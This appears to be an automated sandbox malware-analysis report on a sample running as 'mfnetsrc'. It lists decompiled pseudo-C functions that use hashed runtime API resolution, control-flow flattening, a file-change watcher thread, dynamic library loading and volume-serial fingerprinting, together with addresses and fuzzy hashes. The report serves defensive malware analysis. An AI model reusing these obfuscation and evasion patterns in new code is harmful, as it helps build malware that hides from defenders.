0x00000000
0x02aa9c31
0x02aa9c36
0x02aa9c5c
0x02aa9c66
0x02aa9c80
0x02aa9c80
0x02aa9c86
0x02aa9c8e
0x02aa9ca6
0x02aa9ca8
0x02aa9ca8
0x02aa9cbd
0x02aa9cbf
0x00000000
0x02aa9c38
0x02aa9c3d
0x02aa9d24
0x02aa9d3c
0x02aa9d3c
0x02aa9d4e
0x02aa9d58
0x02aa9d5c
0x02aa9d65
0x00000000
0x00000000
0x00000000
0x02aa9c3d
0x02aa9c36
0x00000000
0x02aa9c2b
0x02aa9cd8
0x00000000
0x02aa9cde
0x02aa9cde
0x02aa9ce5
0x02aa9cf8
0x02aa9cfd
0x02aa9cfd
0x02aa9d11
0x02aa9d13
0x00000000
0x02aa9d13
0x00000000
0x02aa9c43
0x02aa9c43
0x02aa9c55
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 02AA9CBA
QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 02AA9CBD
lstrcmpiW.KERNELBASE(?,?), ref: 02AA9D4E

Strings

79V#, xrefs: 02AA9C72

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: Process$CurrentFullImageNameQuerylstrcmpi
String ID: 79V#
API String ID: 3605714105-696535739
Opcode ID: 539353f62cbbf9ec6d9286c9e095900441205c259d7bb15c23436361405caf1b
Instruction ID: 192ca4a2d8574c368de1e5044cd6ea232677b65f9c5e2c7376f98cd80a2c38c1
Opcode Fuzzy Hash: 539353f62cbbf9ec6d9286c9e095900441205c259d7bb15c23436361405caf1b
Instruction Fuzzy Hash: 9331C376B90606AFDB34AB64A8E477B62E6AFC4754F14086EE481CB240EF74DC05CF91

Uniqueness

Uniqueness Score: -1.00%

Function 029F002D, Relevance: 4.9, APIs: 3, Instructions: 387
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,029F0005), ref: 029F00E9
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,029F0005), ref: 029F0111

Memory Dump Source

Source File: 00000003.00000002.642626999.00000000029F0000.00000040.00000001.sdmp, Offset: 029F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29f0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction ID: 86cc916300626fa80d8c2fdfed763660d9c5b4d96d32ebbd9f6cd376eb403d05
Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction Fuzzy Hash: 51D1D471A083068FDBA4CF59C88077AB3E9FF84318F18452DEA95CB246E774E855CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02AA99A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E02AA99A0() {
				short _v520;
				void* _v524;
				void* _v528;
				char _v532;
				void* _t11;
				intOrPtr* _t12;
				void* _t18;
				intOrPtr* _t20;
				intOrPtr* _t25;
				intOrPtr* _t27;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr* _t38;
				intOrPtr _t41;
				void* _t45;
				intOrPtr* _t59;
				intOrPtr _t63;
				void* _t79;
				void* _t80;
				void* _t82;

				_t79 = _v528;
				_t11 = 0x1e395e13;
				while(1) {
					_t82 = _t11 - 0x1f18c325;
					if(_t82 > 0) {
						goto L24;
					}
					L2:
					if(_t82 == 0) {
						_t25 =  *0x2aade58;
						if(_t25 == 0) {
							_t25 = E02AA3E80(_t45, E02AA3F20(0xbb398380), 0xb1aefb5, _t80);
							 *0x2aade58 = _t25;
						}
						 *_t25(0,  &_v520, 0x104);
						_t27 =  *0x2aadc3c;
						if(_t27 == 0) {
							_t27 = E02AA3E80(_t45, E02AA3F20(0x7539f5a2), 0x3f129d89, _t80);
							 *0x2aadc3c = _t27;
						}
						 *((short*)( *_t27( &_v532))) = 0;
						_t11 = 0x32a2459b;
						continue;
					} else {
						if(_t11 == 0x3932e9b) {
							_t31 =  *0x2aae2f0; // 0xde3dd8
							_v528 =  *(_t31 + 0x3c);
							_t33 =  *0x2aadb04;
							_v524 = _t79;
							if(_t33 == 0) {
								_t33 = E02AA3E80(_t45, E02AA3F20(0xbb398380), 0x7436592b, _t80);
								 *0x2aadb04 = _t33;
							}
							_push(0xffffffff);
							_push(0);
							_push( &_v528);
							_push(2);
							if( *_t33() == 0) {
								L37:
								return 0;
							} else {
								_t11 =  ==  ? 0x18584b48 : 0x3932e9b;
								continue;
							}
						} else {
							if(_t11 == 0x18584b48) {
								if(E02AA9C10(_t80) == 0) {
									_t38 =  *0x2aadcdc; // 0x0
									if(_t38 == 0) {
										_t38 = E02AA3E80(_t45, E02AA3F20(0xbb398380), 0xcaaeebbc, _t80);
										 *0x2aadcdc = _t38;
									}
									 *_t38(_t79);
									L14:
									_t11 = 0x3932e9b;
								} else {
									_t59 =  *0x2aadff4; // 0x0
									if(_t59 == 0) {
										_t59 = E02AA3E80(_t45, E02AA3F20(0xbb398380), 0x1186b083, _t80);
										 *0x2aadff4 = _t59;
									}
									_t41 =  *0x2aae2f0; // 0xde3dd8
									 *_t59( *((intOrPtr*)(_t41 + 0x3c)));
									_t11 = 0x2713957b;
								}
								continue;
							} else {
								if(_t11 == 0x1e395e13) {
									_t11 = 0x1f18c325;
									continue;
									do {
										while(1) {
											_t82 = _t11 - 0x1f18c325;
											if(_t82 > 0) {
												goto L24;
											}
											goto L2;
										}
										goto L24;
									} while (_t11 != 0x2707225a);
									return 0;
								}
							}
						}
					}
					L38:
					L24:
					if(_t11 == 0x2713957b) {
						_t12 =  *0x2aadf90; // 0x0
						if(_t12 == 0) {
							_t12 = E02AA3E80(_t45, E02AA3F20(0xbb398380), 0x5f1f4281, _t80);
							 *0x2aadf90 = _t12;
						}
						 *_t12(_t79);
						goto L37;
					} else {
						if(_t11 != 0x32a2459b) {
							goto L32;
						} else {
							if( *0x2aadca8 == 0) {
								 *0x2aadca8 = E02AA3E80(_t45, E02AA3F20(0xbb398380), 0x39bd4dfe, _t80);
							}
							_t18 = FindFirstChangeNotificationW( &_v520, 0, 1); // executed
							_t79 = _t18;
							if(E02AA9C10(_t80) == 0) {
								goto L14;
							} else {
								_t20 =  *0x2aadff4; // 0x0
								if(_t20 == 0) {
									_t20 = E02AA3E80(_t45, E02AA3F20(0xbb398380), 0x1186b083, _t80);
									 *0x2aadff4 = _t20;
								}
								_t63 =  *0x2aae2f0; // 0xde3dd8
								 *_t20( *((intOrPtr*)(_t63 + 0x3c)));
								_t11 = 0x2713957b;
							}
							continue;
						}
					}
					goto L38;
				}
			}

0x02aa99a7
0x02aa99ab
0x02aa99c0
0x02aa99c0
0x02aa99c5
0x00000000
0x00000000
0x02aa99cb
0x02aa99cb
0x02aa9ac3
0x02aa9aca
0x02aa9add
0x02aa9ae2
0x02aa9ae2
0x02aa9af3
0x02aa9af5
0x02aa9afc
0x02aa9b0f
0x02aa9b14
0x02aa9b14
0x02aa9b22
0x02aa9b25
0x00000000
0x02aa99d1
0x02aa99d6
0x02aa9a68
0x02aa9a70
0x02aa9a74
0x02aa9a79
0x02aa9a7f
0x02aa9a92
0x02aa9a97
0x02aa9a97
0x02aa9a9c
0x02aa9a9e
0x02aa9aa4
0x02aa9aa5
0x02aa9aad
0x02aa9bf8
0x02aa9c01
0x02aa9ab3
0x02aa9abb
0x00000000
0x02aa9abb
0x02aa99dc
0x02aa99e1
0x02aa99fc
0x02aa9a37
0x02aa9a3e
0x02aa9a51
0x02aa9a56
0x02aa9a56
0x02aa9a5c
0x02aa9a5e
0x02aa9a5e
0x02aa99fe
0x02aa99fe
0x02aa9a06
0x02aa9a1e
0x02aa9a20
0x02aa9a20
0x02aa9a26
0x02aa9a2e
0x02aa9a30
0x02aa9a30
0x00000000
0x02aa99e3
0x02aa99e8
0x02aa99ee
0x02aa99f3
0x02aa99c0
0x02aa99c0
0x02aa99c0
0x02aa99c5
0x00000000
0x00000000
0x00000000
0x02aa99c5
0x00000000
0x02aa99c0
0x02aa9bcd
0x02aa9bcd
0x02aa99e8
0x02aa99e1
0x02aa99d6
0x00000000
0x02aa9b2f
0x02aa9b34
0x02aa9bd0
0x02aa9bd7
0x02aa9bea
0x02aa9bef
0x02aa9bef
0x02aa9bf5
0x00000000
0x02aa9b3a
0x02aa9b3f
0x00000000
0x02aa9b41
0x02aa9b48
0x02aa9b60
0x02aa9b60
0x02aa9b6e
0x02aa9b70
0x02aa9b79
0x00000000
0x02aa9b7f
0x02aa9b7f
0x02aa9b86
0x02aa9b99
0x02aa9b9e
0x02aa9b9e
0x02aa9ba3
0x02aa9bac
0x02aa9bae
0x02aa9bae
0x00000000
0x02aa9b79
0x02aa9b3f
0x00000000
0x02aa9b34

APIs

FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 02AA9B6E

Strings

+Y6t, xrefs: 02AA9A8B

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: ChangeFindFirstNotification
String ID: +Y6t
API String ID: 1065410024-3949905484
Opcode ID: 72fa9c4bc3ba8f01a24a9de71774ba5c40b42049033e1962f4266628a49f7637
Instruction ID: fe21d30b6360b56a861c110498b11ded8c5b09f265ca8c1084a780bb0c458115
Opcode Fuzzy Hash: 72fa9c4bc3ba8f01a24a9de71774ba5c40b42049033e1962f4266628a49f7637
Instruction Fuzzy Hash: 92515E75B41603ABDF24ABB5A9B067F72A76F84344B50481EF586CB290EF70CD128B91

Uniqueness

Uniqueness Score: -1.00%

Function 02AA5BC0, Relevance: 3.1, APIs: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E02AA5BC0(void* __ecx, void* __edx, void* __ebp) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __ebx;
				intOrPtr* _t3;
				void* _t6;
				intOrPtr* _t9;
				void* _t20;
				void* _t21;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t41;

				_t42 = __ebp;
				_t3 =  *0x2aadea8;
				_t20 = __ecx;
				_t38 = __edx;
				if(_t3 == 0) {
					_t3 = E02AA3E80(_t20, E02AA3F20(0xbb398380), 0x97f883e, __ebp);
					 *0x2aadea8 = _t3;
				}
				_t40 =  *_t3();
				if( *0x2aadcec == 0) {
					 *0x2aadcec = E02AA3E80(_t20, E02AA3F20(0xbb398380), 0xe9233692, _t42);
				}
				_t6 = RtlAllocateHeap(_t40, 8, 0x40000); // executed
				_t41 = _t6;
				if(_t41 == 0) {
					return 0;
				} else {
					_push(_t41);
					_push(_v0);
					_push(_v4);
					_t21 = E02AA5880(_t20, _t38);
					_t9 =  *0x2aadea8;
					if(_t9 == 0) {
						_t9 = E02AA3E80(_t21, E02AA3F20(0xbb398380), 0x97f883e, _t42);
						 *0x2aadea8 = _t9;
					}
					_t39 =  *_t9();
					if( *0x2aae1a0 == 0) {
						 *0x2aae1a0 = E02AA3E80(_t21, E02AA3F20(0xbb398380), 0x26c3f343, _t42);
					}
					RtlFreeHeap(_t39, 0, _t41); // executed
					return _t21;
				}
			}

0x02aa5bc0
0x02aa5bc0
0x02aa5bc6
0x02aa5bca
0x02aa5bce
0x02aa5be1
0x02aa5be6
0x02aa5be6
0x02aa5bed
0x02aa5bf6
0x02aa5c0e
0x02aa5c0e
0x02aa5c1b
0x02aa5c1d
0x02aa5c21
0x02aa5c97
0x02aa5c23
0x02aa5c23
0x02aa5c24
0x02aa5c2c
0x02aa5c35
0x02aa5c3a
0x02aa5c41
0x02aa5c54
0x02aa5c59
0x02aa5c59
0x02aa5c60
0x02aa5c69
0x02aa5c81
0x02aa5c81
0x02aa5c8a
0x02aa5c91
0x02aa5c91

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 02AA5C1B
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 02AA5C8A

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID:
API String ID: 2488874121-0
Opcode ID: 92827bb16aa156d786637ffe2936902407ac534b2da56d40bc21adafc7743209
Instruction ID: 718193ffb7da0361e5f51c0e4187752ac60eba4c87ca5bb9bfbdc408e80ced8b
Opcode Fuzzy Hash: 92827bb16aa156d786637ffe2936902407ac534b2da56d40bc21adafc7743209
Instruction Fuzzy Hash: 06118172F812026FDB24ABB569B076B66D7AFD0394B444879F445CB344EFA0CC124BD4

Uniqueness

Uniqueness Score: -1.00%

Function 02A31D10, Relevance: 1.6, APIs: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.642765849.0000000002A31000.00000020.00000001.sdmp, Offset: 02A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a31000_mfnetsrc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728ffcf3309952f2932b6eb30e61f28efd267eca3e641f0b248b2aa845835b42
Instruction ID: 97cbb26ee4dfcc4a8fb470c2af46c60fb8cd0e9acd7c4ebb6b175d3540f3eeaa
Opcode Fuzzy Hash: 728ffcf3309952f2932b6eb30e61f28efd267eca3e641f0b248b2aa845835b42
Instruction Fuzzy Hash: 8341D878A00209EFEB05CF44C494BAAB7B2FB89354F24C559E8195F355DB75EA82CB80

Uniqueness

Uniqueness Score: -1.00%

Function 02AA6FB0, Relevance: 1.6, APIs: 1, Instructions: 107
libraryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E02AA6FB0(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t5;
				intOrPtr* _t6;
				intOrPtr* _t8;
				void* _t21;
				intOrPtr _t28;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x2f7561b9;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x16eb9dc5;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							E02AA6F10(_t21, 0x2aad770, 4, __eflags);
							_t2 = 0x28da268b;
							continue;
						} else {
							_t55 = _t2 - 0x96aa655;
							if(_t55 > 0) {
								__eflags = _t2 - 0x129c963b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E02AA6F10(_t21, 0x2aad7c0, 3, __eflags);
									_t2 = 0x16eb9dc5;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E02AA6F10(_t21, 0x2aad840, 1, __eflags);
									_t2 = 0x6462a46;
									continue;
								} else {
									if(_t2 == 0x34398df) {
										E02AA6F10(_t21, 0x2aad820, 0, __eflags);
										_t2 = 0x96aa655;
										continue;
									} else {
										_t57 = _t2 - 0x6462a46;
										if(_t2 != 0x6462a46) {
											goto L21;
										} else {
											E02AA6F10(_t21, 0x2aad890, 2, _t57);
											_t2 = 0x129c963b;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2cd0d411;
					if(__eflags > 0) {
						__eflags = _t2 - 0x2f7561b9;
						if(__eflags != 0) {
							goto L21;
						} else {
							_t2 = 0x34398df;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 = E02AA34C0(0x2aad7f0);
							__eflags =  *0x2aaddc4;
							if( *0x2aaddc4 == 0) {
								 *0x2aaddc4 = E02AA3E80(_t21, E02AA3F20(0xbb398380), 0x9261db99, _t53);
							}
							_t5 = LoadLibraryW(_t51);
							_t28 =  *0x2aae2e8; // 0xde36b0
							 *(_t28 + 0x28) = _t5;
							_t6 =  *0x2aadea8;
							__eflags = _t6;
							if(_t6 == 0) {
								_t6 = E02AA3E80(_t21, E02AA3F20(0xbb398380), 0x97f883e, _t53);
								 *0x2aadea8 = _t6;
							}
							_t48 =  *_t6();
							_t8 =  *0x2aae1a0;
							__eflags = _t8;
							if(_t8 == 0) {
								_t8 = E02AA3E80(_t21, E02AA3F20(0xbb398380), 0x26c3f343, _t53);
								 *0x2aae1a0 = _t8;
							}
							return  *_t8(_t48, 0, _t51);
						} else {
							__eflags = _t2 - 0x17b18c59;
							if(__eflags == 0) {
								E02AA6F10(_t21, 0x2aad870, 6, __eflags);
								_t2 = 0x2cd0d411;
								goto L1;
							} else {
								__eflags = _t2 - 0x28da268b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E02AA6F10(_t21, 0x2aad790, 5, __eflags);
									_t2 = 0x17b18c59;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x2a0eb481;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}

0x02aa6fb0
0x02aa6fb0
0x02aa6fb0
0x02aa6fb5
0x02aa6fb5
0x02aa6fb5
0x02aa6fb5
0x02aa6fba
0x00000000
0x00000000
0x02aa6fc0
0x02aa704a
0x02aa704f
0x00000000
0x02aa6fc2
0x02aa6fc2
0x02aa6fc7
0x02aa701c
0x02aa7021
0x00000000
0x02aa7027
0x02aa7031
0x02aa7036
0x00000000
0x02aa7036
0x02aa6fc9
0x02aa6fc9
0x02aa7010
0x02aa7015
0x00000000
0x02aa6fcb
0x02aa6fd0
0x02aa6ffa
0x02aa6fff
0x00000000
0x02aa6fd2
0x02aa6fd2
0x02aa6fd7
0x00000000
0x02aa6fdd
0x02aa6fe7
0x02aa6fec
0x00000000
0x02aa6fec
0x02aa6fd7
0x02aa6fd0
0x02aa6fc9
0x02aa6fc7
0x00000000
0x02aa6fc0
0x02aa7059
0x02aa705e
0x02aa70a2
0x02aa70a7
0x00000000
0x02aa70a9
0x02aa70a9
0x00000000
0x02aa70a9
0x02aa7060
0x02aa7060
0x02aa70cb
0x02aa70d2
0x02aa70d4
0x02aa70ec
0x02aa70ec
0x02aa70f2
0x02aa70f4
0x02aa70fa
0x02aa70fd
0x02aa7102
0x02aa7104
0x02aa7117
0x02aa711c
0x02aa711c
0x02aa7123
0x02aa7125
0x02aa712a
0x02aa712c
0x02aa713f
0x02aa7144
0x02aa7144
0x02aa7151
0x02aa7062
0x02aa7062
0x02aa7067
0x02aa7093
0x02aa7098
0x00000000
0x02aa7069
0x02aa7069
0x02aa706e
0x00000000
0x02aa7070
0x02aa707a
0x02aa707f
0x00000000
0x02aa707f
0x02aa706e
0x02aa7067
0x02aa7060
0x00000000
0x02aa70b3
0x02aa70b3
0x02aa70b3
0x02aa70be
0x00000000

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,02AA68DC), ref: 02AA70F2

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6a7483243b0c8457be44ee0a3604188063bf411b05bab1423aed2e58b2757e21
Instruction ID: 7197a4f40a7b9b2c85eed8b540da41ef6a496b18046a94263c0b28ad5076e2fc
Opcode Fuzzy Hash: 6a7483243b0c8457be44ee0a3604188063bf411b05bab1423aed2e58b2757e21
Instruction Fuzzy Hash: 12318D20B841015B9E286BA95AF033F926B9FC4B44F28486BF242CF758DF65CD418F92

Uniqueness

Uniqueness Score: -1.00%

Function 02AA9D70, Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02AA9D70(void* __ebx) {
				void* _t7;
				intOrPtr* _t8;
				intOrPtr* _t10;
				intOrPtr* _t16;
				intOrPtr _t17;
				void* _t20;
				void* _t25;
				intOrPtr _t27;
				void* _t40;
				void* _t41;

				_t25 = __ebx;
				_t7 = 0x94e9677;
				L1:
				while(_t7 != 0x94e9677) {
					if(_t7 == 0x11e89e6c) {
						_t16 =  *0x2aadc9c;
						if(_t16 == 0) {
							_t16 = E02AA3E80(_t25, E02AA3F20(0xbb398380), 0x2a635a2, _t41);
							 *0x2aadc9c = _t16;
						}
						_t17 =  *_t16(0, 0, 0, 0);
						_t27 =  *0x2aae2f0; // 0xde3dd8
						 *((intOrPtr*)(_t27 + 0x3c)) = _t17;
						_t7 = 0x31494004;
						continue;
					} else {
						if(_t7 == 0x31494004) {
							if( *0x2aade90 == 0) {
								 *0x2aade90 = E02AA3E80(_t25, E02AA3F20(0xbb398380), 0x70a5bbfd, _t41);
							}
							_t20 = CreateThread(0, 0, E02AA99A0, 0, 0, 0);
							_t27 =  *0x2aae2f0; // 0xde3dd8
							 *(_t27 + 0x34) = _t20;
							L18:
							return 0 | _t27 != 0x00000000;
						} else {
							if(_t7 != 0xf4b9f58) {
								continue;
							} else {
								return 0 | _t27 != 0x00000000;
							}
						}
					}
					L19:
				}
				_t8 =  *0x2aadea8;
				if(_t8 == 0) {
					_t8 = E02AA3E80(_t25, E02AA3F20(0xbb398380), 0x97f883e, _t41);
					 *0x2aadea8 = _t8;
				}
				_t40 =  *_t8();
				_t10 =  *0x2aadcec;
				if(_t10 == 0) {
					_t10 = E02AA3E80(_t25, E02AA3F20(0xbb398380), 0xe9233692, _t41);
					 *0x2aadcec = _t10;
				}
				_t27 =  *_t10(_t40, 8, 0x40);
				 *0x2aae2f0 = _t27;
				if(_t27 == 0) {
					goto L18;
				} else {
					_t7 = 0x11e89e6c;
					goto L1;
				}
				goto L19;
			}

0x02aa9d70
0x02aa9d76
0x00000000
0x02aa9d80
0x02aa9d8c
0x02aa9da9
0x02aa9db0
0x02aa9dc3
0x02aa9dc8
0x02aa9dc8
0x02aa9dd5
0x02aa9dd7
0x02aa9ddd
0x02aa9de0
0x00000000
0x02aa9d8e
0x02aa9d93
0x02aa9e57
0x02aa9e6f
0x02aa9e6f
0x02aa9e83
0x02aa9e85
0x02aa9e8b
0x02aa9e8e
0x02aa9e96
0x02aa9d99
0x02aa9d9e
0x00000000
0x02aa9da0
0x02aa9da8
0x02aa9da8
0x02aa9d9e
0x02aa9d93
0x00000000
0x02aa9d8c
0x02aa9de7
0x02aa9dee
0x02aa9e01
0x02aa9e06
0x02aa9e06
0x02aa9e0d
0x02aa9e0f
0x02aa9e16
0x02aa9e29
0x02aa9e2e
0x02aa9e2e
0x02aa9e3a
0x02aa9e3c
0x02aa9e44
0x00000000
0x02aa9e46
0x02aa9e46
0x00000000
0x02aa9e46
0x00000000

APIs

CreateThread.KERNELBASE(00000000,00000000,02AA99A0,00000000,00000000,00000000), ref: 02AA9E83

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9ab8dc669527f3d0022dfccc6f63615de6205e15c3e872443d7c4217162fc76e
Instruction ID: 3efd2bd57d41cb8958c4f6d03665543a642abe457c4c9b8c49d73a01f79fec0f
Opcode Fuzzy Hash: 9ab8dc669527f3d0022dfccc6f63615de6205e15c3e872443d7c4217162fc76e
Instruction Fuzzy Hash: 9C216230B813036BEF649B759AB1B7A6292AF80744F54885DE546CF684EF60DC128F85

Uniqueness

Uniqueness Score: -1.00%

Function 02AA46F0, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02AA46F0(void* __ebx, void* __edx, void* __ebp) {
				char _v16;
				void* __ecx;
				intOrPtr* _t2;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr* _t7;
				void* _t14;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t33;
				intOrPtr* _t37;

				_t36 = __ebp;
				_t13 = __ebx;
				_t2 =  *0x2aadea4;
				 *_t37 = 0x104;
				_t32 = _t14;
				_t27 = __edx;
				if(_t2 == 0) {
					_t2 = E02AA3E80(__ebx, E02AA3F20(0xbb398380), 0x4791debe, __ebp);
					 *0x2aadea4 = _t2;
				}
				_t33 =  *_t2(0x1000, 0, _t32);
				if(_t33 == 0) {
					return 0;
				} else {
					_t5 =  *0x2aadf2c;
					if(_t5 == 0) {
						_t5 = E02AA3E80(_t13, E02AA3F20(0xbb398380), 0xd0ee7032, _t36);
						 *0x2aadf2c = _t5;
					}
					_t6 =  *_t5(_t33, 0, _t27,  &_v16); // executed
					_t29 = _t6;
					_t7 =  *0x2aadc70;
					if(_t7 == 0) {
						_t7 = E02AA3E80(_t13, E02AA3F20(0xbb398380), 0x560d239b, _t36);
						 *0x2aadc70 = _t7;
					}
					 *_t7(_t33);
					return _t29;
				}
			}

0x02aa46f0
0x02aa46f0
0x02aa46f1
0x02aa46f6
0x02aa46fe
0x02aa4701
0x02aa4705
0x02aa4718
0x02aa471d
0x02aa471d
0x02aa472c
0x02aa4730
0x02aa4795
0x02aa4732
0x02aa4732
0x02aa4739
0x02aa474c
0x02aa4751
0x02aa4751
0x02aa475f
0x02aa4761
0x02aa4763
0x02aa476a
0x02aa477d
0x02aa4782
0x02aa4782
0x02aa4788
0x02aa478f
0x02aa478f

APIs

QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,2564BE4F), ref: 02AA475F

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 12562677ed08b84bffb54136be3c8895c7b60ff28c8f1673b886ff1ff346ff2e
Instruction ID: 4702bb173f2d9cb67ff26df2484add7b1523192201d6f89dac95e072fa1b3bc9
Opcode Fuzzy Hash: 12562677ed08b84bffb54136be3c8895c7b60ff28c8f1673b886ff1ff346ff2e
Instruction Fuzzy Hash: 6D01D675B41502ABD724ABB9A860B6F62E79FC4391B04446EF485CF340EFB0CC024BD0

Uniqueness

Uniqueness Score: -1.00%

Function 02AA5490, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E02AA5490(void* __ebx, void* __ebp) {
				char _v520;
				short _v528;
				long _v532;
				intOrPtr* _t7;
				short* _t10;
				WCHAR** _t28;

				_t27 = __ebp;
				_t16 = __ebx;
				_t7 =  *0x2aae1b8;
				 *_t28 = 0;
				if(_t7 == 0) {
					_t7 = E02AA3E80(__ebx, E02AA3F20(0xbb398380), 0x61bf6c0c, __ebp);
					 *0x2aae1b8 = _t7;
				}
				_push(0x104);
				_push( &_v520);
				if( *_t7() != 0) {
					_t10 =  &_v528;
					if(_v528 != 0) {
						while( *_t10 != 0x5c) {
							_t10 = _t10 + 2;
							if( *_t10 != 0) {
								continue;
							} else {
							}
							goto L9;
						}
						 *((short*)(_t10 + 2)) = 0;
					}
					L9:
					if( *0x2aae23c == 0) {
						 *0x2aae23c = E02AA3E80(_t16, E02AA3F20(0xbb398380), 0x8837cb40, _t27);
					}
					GetVolumeInformationW( &_v528, 0, 0,  &_v532, 0, 0, 0, 0); // executed
				}
				return _v532;
			}

0x02aa5490
0x02aa5490
0x02aa5496
0x02aa549b
0x02aa54a4
0x02aa54b7
0x02aa54bc
0x02aa54bc
0x02aa54c1
0x02aa54ca
0x02aa54cf
0x02aa54d7
0x02aa54db
0x02aa54e0
0x02aa54e6
0x02aa54ed
0x00000000
0x00000000
0x02aa54ef
0x00000000
0x02aa54ed
0x02aa54f3
0x02aa54f3
0x02aa54f7
0x02aa54fe
0x02aa5516
0x02aa5516
